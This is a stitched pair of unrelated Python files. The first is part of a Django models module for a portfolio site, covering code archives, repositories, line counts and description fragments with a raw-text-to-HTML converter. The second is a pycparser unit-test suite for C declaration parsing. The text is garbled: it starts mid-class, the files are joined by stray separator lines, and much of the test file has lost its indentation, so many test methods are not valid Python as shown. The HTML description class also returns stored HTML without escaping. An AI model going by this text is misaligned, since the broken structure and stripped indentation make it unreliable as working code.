    project = models.ForeignKey(Project, help_text=_("Linked to the project"))
    upload_time = models.DateTimeField(auto_now_add=True)
    exclude_paths = models.TextField(blank=True, null=True, help_text=_("Paths to exclude, one per line (eg.: */static/bootstrap/*)"))
    lines_ready = models.BooleanField(default=False, help_text=_("Lines ready == True => the lines of that instance have already been counted"))
    # class Meta:
    #     abstract = True
    # Not abstract on purpose, to keep a single relation table; a more
    # precise explanation is given on the Description class below.
    class Meta:
        ordering = ["-upload_time",]
class SourceCode(Code):
    """
    Source Code objects store the source code of a given project (tar.gz/zip file extension).
    Its content should be accessible only by authenticated people.
    """
    def upload_path(self, filename):
        # Suffix the base name with the number of existing Code rows to avoid
        # collisions. Assumes the upload is either *.zip or *.tar.gz
        # (CustomFileField restricts extensions to those two below).
        if filename.endswith(".zip"):
            return os.path.join('sourcecode', str(self.project.id), '%s_%d.zip' % (filename[:-4], self.project.code_set.count()))
        return os.path.join('sourcecode', str(self.project.id), '%s_%d.tar.gz' % (filename[:-7], self.project.code_set.count()))
    archive = CustomFileField(upload_to=upload_path, file_extensions=["tar.gz", "zip"], help_text=_("Source Code (*.tar.gz/*.zip) of your project"))
    def __unicode__(self):
        return self.archive.name
class Repository(Code):
    """
    Details concerning a repository.
    A cron task can then update the number of lines automatically without
    having to update an archive (SourceCode).
    """
    # Supported revision-control backends: (stored value, display label).
    SOFT_CHOICES = (
        ("git", "Git"),
        ("hg", "Mercurial"),
        ("zip", "ZIP-ball, TAR.GZ-ball"),
    )
    url = models.URLField(max_length=200, help_text=_("URL of the repository"))
    software = models.CharField(max_length=3, choices=SOFT_CHOICES, help_text=_("Which distributed revision control tool?"))
    def __unicode__(self):
        return "%s [%s]" % (self.url, self.software)
class SourceToTechnoLines(models.Model):
    """
    Number of lines for a given (Code, Technology) pair.
    """
    code = models.ForeignKey(Code, help_text=_("Code described"))
    technology = models.ForeignKey(Technology, help_text=_("Technology concerned"))
    num_lines = models.IntegerField(help_text=_("Number of lines of a given technology in a code"))
    def __unicode__(self):
        return "%d lines of %s" % (self.num_lines, self.technology.name)
    class Meta:
        # A given pair cannot have several values for num_lines
        unique_together = ("code", "technology")
class Description(InheritanceCastModel):
    """
    Base class for a project's description fragments (raw text, HTML, image).

    Fragments are ordered by `position`; concrete rendering is delegated to
    the subclass through the InheritanceCastModel downcast.
    """
    project = models.ForeignKey(Project, help_text=_("Project"))
    position = models.IntegerField(default=0, help_text=_("Description's position (the smallest at the top, default value implies last one)"))
    data_anchor = models.CharField(max_length=50, blank=True, null=True, help_text=_("Data-anchor value (used to generate the wavy-menu) - optional"))
    created = models.DateTimeField(auto_now_add=True, help_text=_("Timestamp of creation"))
    modified = models.DateTimeField(auto_now=True, help_text=_("Timestamp of last changes"))
    def save(self, *args, **kwargs):
        """
        Auto-assign the position (last within the project) when not set (or =0).
        """
        if not self.position:
            try:
                self.position = Description.objects.filter(project=self.project).order_by("-position")[0].position + 1
            except IndexError:
                # No description yet for this project: start numbering at 1.
                # (Was a bare `except:`, which also hid genuine DB errors.)
                self.position = 1
        super(Description, self).save(*args, **kwargs)
    def get_safe_html(self):
        """
        Return a mark_safe string displaying the description, rendered by the
        concrete subclass; the optional data-anchor attribute is injected
        into the first opening tag.
        """
        subclass = self.cast()
        escaped_text = subclass.get_safe_html()
        # Add data-anchor to paragraphs
        if self.data_anchor and len(self.data_anchor) > 0:
            escaped_text = re.sub(r'^<(?P<details>[^>]+)>', '<\g<details> data-anchor="%s">' % self.data_anchor, escaped_text)
        return mark_safe(escaped_text)
    class Meta:
        # Option abstract is not in use. Otherwise we would have one relation table for each child of that class
        # that is to say: projects_rawtextdescription, projects_htmlcodedescription, projects_imagedescription
        # instead of: projects_description
        # abstract = True
        ordering = ["position"]
@receiver(post_save, sender=Description, dispatch_uid='description_save_signal')
def post_save_description(sender, instance, using, **kwargs):
    """Touch the parent Project so its `modified` timestamp is refreshed."""
    instance.project.save() #Update modified
class RawTextDescription(Description):
    """A description fragment written in a small Markdown-like raw-text
    syntax; the HTML rendering is generated and cached on save."""
    description = models.TextField(help_text=_("Description - Raw Text"))
    description_html = models.TextField(help_text=_("HTML code automatically generated"))
    def rawtext_to_html(self):
        """
        Convert the raw text to HTML: every URL in the text becomes a
        hyperlink, and the text is HTML-escaped before adding hyperlinks.

        URL to link/image
        -----------------
        INPUT: need to start with a space or new line..
            Please visit: http://portfolio.dubien.me/
        OUTPUT:
            <p>Please visit: <a href="http://portfolio.dubien.me/" target="blank_">http://portfolio.dubien.me/</a></p>
        INPUT:
            ![my favicon](http://portfolio.dubien.me/favicon.ico)
        OUTPUT:
            <p><img src="http://portfolio.dubien.me/favicon.ico" alt="my favicon" class="image_from_rawtext" /></p>
        INPUT:
            [Click here](http://portfolio.dubien.me/) to try it!
        OUTPUT:
            <p><a href="http://portfolio.dubien.me/" target="blank_">Click here</a> to try it!</p>

        Bulletpoints to list
        --------------------
        INPUT:
            This is a list:
            + element 1
            + element 2
        OUTPUT:
            <p>This is a list:</p><ul><li>element 1</li><li>element 2</li></ul>
        INPUT:
            This is a list:
            + 1
            + + 1.1
            + + 1.2
            + 2
        OUTPUT:
            <p>This is a list:</p><ul><li>1<ul><li>1.1</li><li>1.2</li></ul></li><li>2</li></ul>

        Italic/Bold
        -----------
        INPUT:
            This text is *italic* and this one **bold**.
        OUTPUT:
            <p>This text is <em>italic</em> and this one <strong>bold</strong>.</p>
        """
        # NOTE: removed an unused `parent = super(...)` local that served no purpose.
        escaped_text = escape(self.description)
        # URL to link/image
        escaped_text = re.sub(r'(?P<begin>^|\n|\s)(?P<url>http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)', '\g<begin><a href="\g<url>" target="blank_">\g<url></a>', escaped_text)
        escaped_text = re.sub(r'!\[(?P<alt>[^\]]*)\]\((?P<url>http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)\)', '<img src="\g<url>" alt="\g<alt>" class="image_from_rawtext" />', escaped_text)
        escaped_text = re.sub(r'\[(?P<title>[^\]]+)\]\((?P<url>http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)\)', '<a href="\g<url>" target="blank_">\g<title></a>', escaped_text)
        # Bulletpoints to list
        before = escaped_text
        escaped_text = re.sub(r'\n\+\s(?P<li_element>[^\n]+)', '</p><ul><li>\g<li_element></li></ul><p>', escaped_text).replace('</ul><p></p><ul>', '')
        # Other levels for bulletpoints
        while before != escaped_text:
            before = escaped_text
            # pattern: <li>+ xxxxxxxxx</li>
            # < cannot be found in the original text (escaped)
            escaped_text = re.sub(r'<li>\+\s(?P<li_element>[^<]+)</li>', '<ul><li>\g<li_element></li></ul>', escaped_text).replace('</ul><ul>', '')
            # This part computes the corresponding valid syntax for nested lists
            # the current value of escaped_text should already be fine for most of the browsers
            # We will get something like:
            # <ul><li>1</li><ul><li>1.1</li></ul></ul>
            # instead of:
            # <ul><li>1<ul><li>1.1</li></ul></li></ul>
            escaped_text = re.sub(r'</li><ul>(?P<li_elements>.+)</ul>', '<ul>\g<li_elements></ul></li>', escaped_text)
            # or:
            # <ul><ul><li>1.1</li></ul></ul>
            # instead of:
            # <ul><li><ul><li>1.1</li></ul></li></ul>
            escaped_text = re.sub(r'<ul><ul>(?P<li_elements>.+)</ul>', '<ul><li><ul>\g<li_elements></ul></li>', escaped_text)
        del before
        # Balance the paragraph tags opened/closed by the list rewriting.
        if escaped_text.endswith("<p>"):
            escaped_text = escaped_text[:-3]
        else:
            escaped_text += "</p>"
        if escaped_text.startswith("</p>"):
            escaped_text = escaped_text[4:]
        else:
            escaped_text = "<p>%s" % escaped_text
        # Italic/Bold
        escaped_text = re.sub(r'\*\*(?P<text>[^(\*\<\n)]+)\*\*', '<strong>\g<text></strong>', escaped_text)
        escaped_text = re.sub(r'\*(?P<text>[^(\*\<\n)]+)\*', '<em>\g<text></em>', escaped_text)
        return escaped_text
    def save(self, *args, **kwargs):
        """
        Redefined .save() method of RawTextDescription.
        Automatically generates description_html when saving an object.
        """
        self.description_html = self.rawtext_to_html()
        super(RawTextDescription, self).save(*args, **kwargs)
    def get_safe_html(self, parent=None):
        """
        Return the HTML description;
        if not generated (possible with older versions), generate and save it.
        """
        if self.description and not self.description_html:
            self.save() # save will call rawtext_to_html
        return self.description_html
@receiver(post_save, sender=RawTextDescription, dispatch_uid='rawtextdescription_save_signal')
def post_save_rawtextdescription(sender, instance, using, **kwargs):
    """Touch the parent Project so its `modified` timestamp is refreshed."""
    instance.project.save() #Update modified
class HtmlCodeDescription(Description):
    """A description fragment written directly as HTML."""
    description = models.TextField(help_text=_("Description - Html Code"))
    def get_safe_html(self, parent=None):
        # The stored HTML is returned as-is (no escaping).
        return self.description
@receiver(post_save, sender=HtmlCodeDescription, dispatch_uid='htmlcodedescription_save_signal')
def post_save_htmlcodedescription(sender, instance, using, **kwargs):
    """Touch the parent Project so its `modified` timestamp is refreshed."""
    instance.project.save() #Update modified
class ImageDescription(Description):
    """A description fragment consisting of an image with a legend."""
    def upload_path(self, filename):
        # `project` is inherited from Description; access it directly instead
        # of going through an unnecessary super() proxy as before.
        return os.path.join('description', str(self.project.id), filename)
    image = models.ImageField(upload_to=upload_path, help_text=_("Image"))
    legend = models.CharField(max_length=150, help_text=_("Image legend"))
    def get_safe_html(self):
        return """<p class="image"><img src="/media/%s" alt="%s" /><br/><span class="legend">%s</span></p>""" % (escape(self.image), escape(self.legend), escape(self.legend))
@receiver(post_save, sender=ImageDescription, dispatch_uid='imagedescription_save_signal')
def post_save_imagedescription(sender, instance, using, **kwargs):
    """Touch the parent Project so its `modified` timestamp is refreshed."""
    instance.project.save() #Update modified
@receiver(pre_delete, sender=ImageDescription, dispatch_uid='imagedescription_delete_signal')
def pre_delete_imagedescription(sender, instance, using, **kwargs):
    """Remove the image file from disk when the row is deleted."""
    if os.path.isfile(instance.image.path):
        os.remove(instance.image.path)
|
|
#!/usr/bin/env python
import pprint
import re
import os, sys
import unittest
sys.path.insert(0, '..')
from pycparser import c_parser
from pycparser.c_ast import *
from pycparser.c_parser import CParser, Coord, ParseError
# Single parser instance shared by every test case (see TestCParser_base.setUp);
# yacc_debug=True makes the parser emit its debug output during table building.
_c_parser = c_parser.CParser(
    lex_optimize=False,
    yacc_debug=True,
    yacc_optimize=False,
    yacctab='yacctab')
def expand_decl(decl):
    """ Convert a declaration AST node into a nested-list summary,
        used by the tests to compare parse results compactly.
    """
    node_type = type(decl)
    if node_type == TypeDecl:
        return ['TypeDecl', expand_decl(decl.type)]
    if node_type == IdentifierType:
        return ['IdentifierType', decl.names]
    if node_type == ID:
        return ['ID', decl.name]
    if node_type in (Struct, Union):
        members = [expand_decl(mem) for mem in decl.decls or []]
        return [node_type.__name__, decl.name, members]
    # Every remaining node kind wraps an inner type recursively.
    inner = expand_decl(decl.type)
    if node_type == Decl:
        if decl.quals:
            return ['Decl', decl.quals, decl.name, inner]
        return ['Decl', decl.name, inner]
    if node_type == Typename:  # for function parameters
        if decl.quals:
            return ['Typename', decl.quals, inner]
        return ['Typename', inner]
    if node_type == ArrayDecl:
        return ['ArrayDecl', decl.dim.value if decl.dim else '', inner]
    if node_type == PtrDecl:
        return ['PtrDecl', inner]
    if node_type == Typedef:
        return ['Typedef', decl.name, inner]
    if node_type == FuncDecl:
        params = [expand_decl(param) for param in decl.args.params] if decl.args else []
        return ['FuncDecl', params, inner]
def expand_init(init):
    """ Convert an initializer AST node into a nested-list summary. """
    node_type = type(init)
    if node_type == NamedInitializer:
        designators = [expand_init(dp) for dp in init.name]
        return (designators, expand_init(init.expr))
    if node_type == ExprList:
        return [expand_init(expr) for expr in init.exprs]
    if node_type == Constant:
        return ['Constant', init.type, init.value]
    if node_type == ID:
        return ['ID', init.name]
class TestCParser_base(unittest.TestCase):
    """Shared fixture: every test case parses through the module-level
    _c_parser instance."""
    def parse(self, txt, filename=''):
        return self.cparser.parse(txt, filename)
    def setUp(self):
        # Reuse the single, pre-built module-level parser.
        self.cparser = _c_parser
class TestCParser_fundamentals(TestCParser_base):
    def get_decl(self, txt, index=0):
        """ Given a source and an index, return the expanded
            declaration at that index.

            FileAST holds a list of 'external declarations';
            `index` is the offset of the desired declaration in that
            list.
        """
        t = self.parse(txt).ext[index]
        return expand_decl(t)
    def get_decl_init(self, txt, index=0):
        """ Return the expanded initializer of the declaration
            at `index`.
        """
        t = self.parse(txt).ext[index]
        return expand_init(t.init)
def test_FileAST(self):
t = self.parse('int a; char c;')
self.failUnless(isinstance(t, FileAST))
self.assertEqual(len(t.ext), 2)
# empty file
t2 = self.parse('')
self.failUnless(isinstance(t2, FileAST))
self.assertEqual(len(t2.ext), 0)
# First statement empty
t = self.parse('; char c;')
self.assertEqual(len(t.ext), 1)
def test_empty_toplevel_decl(self):
code = 'int foo;;'
t = self.parse(code)
self.failUnless(isinstance(t, FileAST))
self.assertEqual(len(t.ext), 1)
self.assertEqual(self.get_decl(code),
['Decl', 'foo',
['TypeDecl', ['IdentifierType', ['int']]]])
def assert_coord(self, node, line, file=None):
self.assertEqual(node.coord.line, line)
if file:
self.assertEqual(node.coord.file, file)
    def test_coords(self):
        """ Tests the "coordinates" of parsed elements - file
            name and line numbers, with modifications inserted by
            #line directives.
        """
        self.assert_coord(self.parse('int a;').ext[0], 1)
        t1 = """
        int a;
        int b;\n\n
        int c;
        """
        f1 = self.parse(t1, filename='test.c')
        self.assert_coord(f1.ext[0], 2, 'test.c')
        self.assert_coord(f1.ext[1], 3, 'test.c')
        self.assert_coord(f1.ext[2], 6, 'test.c')
        t1_1 = '''
        int main() {
            k = p;
            printf("%d", b);
            return 0;
        }'''
        f1_1 = self.parse(t1_1, filename='test.c')
        self.assert_coord(f1_1.ext[0].body.block_items[0], 3, 'test.c')
        self.assert_coord(f1_1.ext[0].body.block_items[1], 4, 'test.c')
        t1_2 = '''
        int main () {
            int p = (int) k;
        }'''
        f1_2 = self.parse(t1_2, filename='test.c')
        # make sure that the Cast has a coord (issue 23)
        self.assert_coord(f1_2.ext[0].body.block_items[0].init, 3, 'test.c')
        t2 = """
        #line 99
        int c;
        """
        self.assert_coord(self.parse(t2).ext[0], 99)
        t3 = """
        int dsf;
        char p;
        #line 3000 "in.h"
        char d;
        """
        f3 = self.parse(t3, filename='test.c')
        self.assert_coord(f3.ext[0], 2, 'test.c')
        self.assert_coord(f3.ext[1], 3, 'test.c')
        self.assert_coord(f3.ext[2], 3000, 'in.h')
        t4 = """
        #line 20 "restore.h"
        int maydler(char);
        #line 30 "includes/daween.ph"
        long j, k;
        #line 50000
        char* ro;
        """
        f4 = self.parse(t4, filename='myb.c')
        self.assert_coord(f4.ext[0], 20, 'restore.h')
        self.assert_coord(f4.ext[1], 30, 'includes/daween.ph')
        self.assert_coord(f4.ext[2], 30, 'includes/daween.ph')
        # A bare #line keeps the current file name.
        self.assert_coord(f4.ext[3], 50000, 'includes/daween.ph')
        t5 = """
        int
        #line 99
        c;
        """
        self.assert_coord(self.parse(t5).ext[0], 99)
def test_simple_decls(self):
self.assertEqual(self.get_decl('int a;'),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['int']]]])
self.assertEqual(self.get_decl('unsigned int a;'),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['unsigned', 'int']]]])
self.assertEqual(self.get_decl('_Bool a;'),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['_Bool']]]])
self.assertEqual(self.get_decl('float _Complex fcc;'),
['Decl', 'fcc', ['TypeDecl', ['IdentifierType', ['float', '_Complex']]]])
self.assertEqual(self.get_decl('char* string;'),
['Decl', 'string',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]])
self.assertEqual(self.get_decl('long ar[15];'),
['Decl', 'ar',
['ArrayDecl', '15',
['TypeDecl', ['IdentifierType', ['long']]]]])
self.assertEqual(self.get_decl('long long ar[15];'),
['Decl', 'ar',
['ArrayDecl', '15',
['TypeDecl', ['IdentifierType', ['long', 'long']]]]])
self.assertEqual(self.get_decl('unsigned ar[];'),
['Decl', 'ar',
['ArrayDecl', '',
['TypeDecl', ['IdentifierType', ['unsigned']]]]])
self.assertEqual(self.get_decl('int strlen(char* s);'),
['Decl', 'strlen',
['FuncDecl',
[['Decl', 's',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]],
['TypeDecl', ['IdentifierType', ['int']]]]])
self.assertEqual(self.get_decl('int strcmp(char* s1, char* s2);'),
['Decl', 'strcmp',
['FuncDecl',
[ ['Decl', 's1',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]],
['Decl', 's2',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]
],
['TypeDecl', ['IdentifierType', ['int']]]]])
def test_nested_decls(self): # the fun begins
self.assertEqual(self.get_decl('char** ar2D;'),
['Decl', 'ar2D',
['PtrDecl', ['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]])
self.assertEqual(self.get_decl('int (*a)[1][2];'),
['Decl', 'a',
['PtrDecl',
['ArrayDecl', '1',
['ArrayDecl', '2',
['TypeDecl', ['IdentifierType', ['int']]]]]]])
self.assertEqual(self.get_decl('int *a[1][2];'),
['Decl', 'a',
['ArrayDecl', '1',
['ArrayDecl', '2',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['int']]]]]]])
self.assertEqual(self.get_decl('char ***ar3D[40];'),
['Decl', 'ar3D',
['ArrayDecl', '40',
['PtrDecl', ['PtrDecl', ['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]]]])
self.assertEqual(self.get_decl('char (***ar3D)[40];'),
['Decl', 'ar3D',
['PtrDecl', ['PtrDecl', ['PtrDecl',
['ArrayDecl', '40', ['TypeDecl', ['IdentifierType', ['char']]]]]]]])
self.assertEqual(self.get_decl('int (*x[4])(char, int);'),
['Decl', 'x',
['ArrayDecl', '4',
['PtrDecl',
['FuncDecl',
[ ['Typename', ['TypeDecl', ['IdentifierType', ['char']]]],
['Typename', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]]])
self.assertEqual(self.get_decl('char *(*(**foo [][8])())[];'),
['Decl', 'foo',
['ArrayDecl', '',
['ArrayDecl', '8',
['PtrDecl', ['PtrDecl',
['FuncDecl',
[],
['PtrDecl',
['ArrayDecl', '',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['char']]]]]]]]]]]])
# explore named and unnamed function pointer parameters,
# with and without qualifiers
#
# unnamed w/o quals
self.assertEqual(self.get_decl('int (*k)(int);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Typename', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# unnamed w/ quals
self.assertEqual(self.get_decl('int (*k)(const int);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Typename', ['const'], ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# named w/o quals
self.assertEqual(self.get_decl('int (*k)(int q);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Decl', 'q', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# named w/ quals
self.assertEqual(self.get_decl('int (*k)(const volatile int q);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Decl', ['const', 'volatile'], 'q',
['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# restrict qualifier
self.assertEqual(self.get_decl('int (*k)(restrict int* q);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Decl', ['restrict'], 'q',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['int']]]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
def test_qualifiers_storage_specifiers(self):
def assert_qs(txt, index, quals, storage):
d = self.parse(txt).ext[index]
self.assertEqual(d.quals, quals)
self.assertEqual(d.storage, storage)
assert_qs("extern int p;", 0, [], ['extern'])
assert_qs("const long p = 6;", 0, ['const'], [])
d1 = "static const int p, q, r;"
for i in range(3):
assert_qs(d1, i, ['const'], ['static'])
d2 = "static char * const p;"
assert_qs(d2, 0, [], ['static'])
pdecl = self.parse(d2).ext[0].type
self.failUnless(isinstance(pdecl, PtrDecl))
self.assertEqual(pdecl.quals, ['const'])
def test_sizeof(self):
e = """
void foo()
{
int a = sizeof k;
int b = sizeof(int);
int c = sizeof(int**);;
char* p = "just to make sure this parses w/o error...";
int d = sizeof(int());
}
"""
compound = self.parse(e).ext[0].body
s1 = compound.block_items[0].init
self.assertTrue(isinstance(s1, UnaryOp))
self.assertEqual(s1.op, 'sizeof')
self.assertTrue(isinstance(s1.expr, ID))
self.assertEqual(s1.expr.name, 'k')
s2 = compound.block_items[1].init
self.assertEqual(expand_decl(s2.expr),
['Typename', ['TypeDecl', ['IdentifierType', ['int']]]])
s3 = compound.block_items[2].init
self.assertEqual(expand_decl(s3.expr),
['Typename',
['PtrDecl',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['int']]]]]])
# The C99 compound literal feature
#
def test_compound_literals(self):
ps1 = self.parse(r'''
void foo() {
p = (long long){k};
tc = (struct jk){.a = {1, 2}, .b[0] = t};
}''')
compound = ps1.ext[0].body.block_items[0].rvalue
self.assertEqual(expand_decl(compound.type),
['Typename', ['TypeDecl', ['IdentifierType', ['long', 'long']]]])
self.assertEqual(expand_init(compound.init),
[['ID', 'k']])
compound = ps1.ext[0].body.block_items[1].rvalue
self.assertEqual(expand_decl(compound.type),
['Typename', ['TypeDecl', ['Struct', 'jk', []]]])
self.assertEqual(expand_init(compound.init),
[
([['ID', 'a']], [['Constant', 'int', '1'], ['Constant', 'int', '2']]),
([['ID', 'b'], ['Constant', 'int', '0']], ['ID', 't'])])
def test_enums(self):
e1 = "enum mycolor op;"
e1_type = self.parse(e1).ext[0].type.type
self.assertTrue(isinstance(e1_type, Enum))
self.assertEqual(e1_type.name, 'mycolor')
self.assertEqual(e1_type.values, None)
e2 = "enum mysize {large=20, small, medium} shoes;"
e2_type = self.parse(e2).ext[0].type.type
self.assertTrue(isinstance(e2_type, Enum))
self.assertEqual(e2_type.name, 'mysize')
e2_elist = e2_type.values
self.assertTrue(isinstance(e2_elist, EnumeratorList))
for e2_eval in e2_elist.enumerators:
self.assertTrue(isinstance(e2_eval, Enumerator))
self.assertEqual(e2_elist.enumerators[0].name, 'large')
self.assertEqual(e2_elist.enumerators[0].value.value, '20')
self.assertEqual(e2_elist.enumerators[2].name, 'medium')
self.assertEqual(e2_elist.enumerators[2].value, None)
# enum with trailing comma (C99 feature)
e3 = """
enum
{
red,
blue,
green,
} color;
"""
e3_type = self.parse(e3).ext[0].type.type
self.assertTrue(isinstance(e3_type, Enum))
e3_elist = e3_type.values
self.assertTrue(isinstance(e3_elist, EnumeratorList))
for e3_eval in e3_elist.enumerators:
self.assertTrue(isinstance(e3_eval, Enumerator))
self.assertEqual(e3_elist.enumerators[0].name, 'red')
self.assertEqual(e3_elist.enumerators[0].value, None)
self.assertEqual(e3_elist.enumerators[1].name, 'blue')
self.assertEqual(e3_elist.enumerators[2].name, 'green')
def test_typedef(self):
# without typedef, error
s1 = """
node k;
"""
self.assertRaises(ParseError, self.parse, s1)
# now with typedef, works
s2 = """
typedef void* node;
node k;
"""
ps2 = self.parse(s2)
self.assertEqual(expand_decl(ps2.ext[0]),
['Typedef', 'node',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['void']]]]])
self.assertEqual(expand_decl(ps2.ext[1]),
['Decl', 'k',
['TypeDecl', ['IdentifierType', ['node']]]])
s3 = """
typedef int T;
typedef T *pT;
pT aa, bb;
"""
ps3 = self.parse(s3)
self.assertEqual(expand_decl(ps3.ext[3]),
['Decl', 'bb',
['TypeDecl', ['IdentifierType', ['pT']]]])
s4 = '''
typedef char* __builtin_va_list;
typedef __builtin_va_list __gnuc_va_list;
'''
ps4 = self.parse(s4)
self.assertEqual(expand_decl(ps4.ext[1]),
['Typedef', '__gnuc_va_list',
['TypeDecl',
['IdentifierType', ['__builtin_va_list']]]])
s5 = '''typedef struct tagHash Hash;'''
ps5 = self.parse(s5)
self.assertEqual(expand_decl(ps5.ext[0]),
['Typedef', 'Hash', ['TypeDecl', ['Struct', 'tagHash', []]]])
def test_struct_union(self):
s1 = """
struct {
int id;
char* name;
} joe;
"""
self.assertEqual(expand_decl(self.parse(s1).ext[0]),
['Decl', 'joe',
['TypeDecl', ['Struct', None,
[ ['Decl', 'id',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'name',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['char']]]]]]]]])
s2 = """
struct node p;
"""
self.assertEqual(expand_decl(self.parse(s2).ext[0]),
['Decl', 'p',
['TypeDecl', ['Struct', 'node', []]]])
s21 = """
union pri ra;
"""
self.assertEqual(expand_decl(self.parse(s21).ext[0]),
['Decl', 'ra',
['TypeDecl', ['Union', 'pri', []]]])
s3 = """
struct node* p;
"""
self.assertEqual(expand_decl(self.parse(s3).ext[0]),
['Decl', 'p',
['PtrDecl',
['TypeDecl', ['Struct', 'node', []]]]])
s4 = """
struct node;
"""
self.assertEqual(expand_decl(self.parse(s4).ext[0]),
['Decl', None,
['Struct', 'node', []]])
s5 = """
union
{
struct
{
int type;
} n;
struct
{
int type;
int intnode;
} ni;
} u;
"""
self.assertEqual(expand_decl(self.parse(s5).ext[0]),
['Decl', 'u',
['TypeDecl',
['Union', None,
[['Decl', 'n',
['TypeDecl',
['Struct', None,
[['Decl', 'type',
['TypeDecl', ['IdentifierType', ['int']]]]]]]],
['Decl', 'ni',
['TypeDecl',
['Struct', None,
[['Decl', 'type',
['TypeDecl', ['IdentifierType', ['int']]]],
['Decl', 'intnode',
['TypeDecl', ['IdentifierType', ['int']]]]]]]]]]]])
s6 = """
typedef struct foo_tag
{
void* data;
} foo, *pfoo;
"""
s6_ast = self.parse(s6)
self.assertEqual(expand_decl(s6_ast.ext[0]),
['Typedef', 'foo',
['TypeDecl',
['Struct', 'foo_tag',
[['Decl', 'data',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['void']]]]]]]]])
self.assertEqual(expand_decl(s6_ast.ext[1]),
['Typedef', 'pfoo',
['PtrDecl',
['TypeDecl',
['Struct', 'foo_tag',
[['Decl', 'data',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['void']]]]]]]]]])
s7 = r"""
struct _on_exit_args {
void * _fnargs[32];
void * _dso_handle[32];
long _fntypes;
#line 77 "D:\eli\cpp_stuff\libc_include/sys/reent.h"
long _is_cxa;
};
"""
s7_ast = self.parse(s7, filename='test.c')
self.assert_coord(s7_ast.ext[0].type.decls[2], 6, 'test.c')
self.assert_coord(s7_ast.ext[0].type.decls[3], 78,
r'D:\eli\cpp_stuff\libc_include/sys/reent.h')
s8 = """
typedef enum tagReturnCode {SUCCESS, FAIL} ReturnCode;
typedef struct tagEntry
{
char* key;
char* value;
} Entry;
typedef struct tagNode
{
Entry* entry;
struct tagNode* next;
} Node;
typedef struct tagHash
{
unsigned int table_size;
Node** heads;
} Hash;
"""
s8_ast = self.parse(s8)
self.assertEqual(expand_decl(s8_ast.ext[3]),
['Typedef', 'Hash',
['TypeDecl', ['Struct', 'tagHash',
[['Decl', 'table_size',
['TypeDecl', ['IdentifierType', ['unsigned', 'int']]]],
['Decl', 'heads',
['PtrDecl', ['PtrDecl', ['TypeDecl', ['IdentifierType', ['Node']]]]]]]]]])
def test_anonymous_struct_union(self):
s1 = """
union
{
union
{
int i;
long l;
};
struct
{
int type;
int intnode;
};
} u;
"""
self.assertEqual(expand_decl(self.parse(s1).ext[0]),
['Decl', 'u',
['TypeDecl',
['Union', None,
[['Decl', None,
['Union', None,
[['Decl', 'i',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'l',
['TypeDecl',
['IdentifierType', ['long']]]]]]],
['Decl', None,
['Struct', None,
[['Decl', 'type',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'intnode',
['TypeDecl',
['IdentifierType', ['int']]]]]]]]]]])
s2 = """
struct
{
int i;
union
{
int id;
char* name;
};
float f;
} joe;
"""
self.assertEqual(expand_decl(self.parse(s2).ext[0]),
['Decl', 'joe',
['TypeDecl',
['Struct', None,
[['Decl', 'i',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', None,
['Union', None,
[['Decl', 'id',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'name',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['char']]]]]]]],
['Decl', 'f',
['TypeDecl',
['IdentifierType', ['float']]]]]]]])
# ISO/IEC 9899:201x Commitee Draft 2010-11-16, N1539
# section 6.7.2.1, par. 19, example 1
s3 = """
struct v {
union {
struct { int i, j; };
struct { long k, l; } w;
};
int m;
} v1;
"""
self.assertEqual(expand_decl(self.parse(s3).ext[0]),
['Decl', 'v1',
['TypeDecl',
['Struct', 'v',
[['Decl', None,
['Union', None,
[['Decl', None,
['Struct', None,
[['Decl', 'i',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'j',
['TypeDecl',
['IdentifierType', ['int']]]]]]],
['Decl', 'w',
['TypeDecl',
['Struct', None,
[['Decl', 'k',
['TypeDecl',
['IdentifierType', ['long']]]],
['Decl', 'l',
['TypeDecl',
['IdentifierType', ['long']]]]]]]]]]],
['Decl', 'm',
['TypeDecl',
['IdentifierType', ['int']]]]]]]])
s4 = """
struct v {
int i;
float;
} v2;"""
# just make sure this doesn't raise ParseError
self.parse(s4)
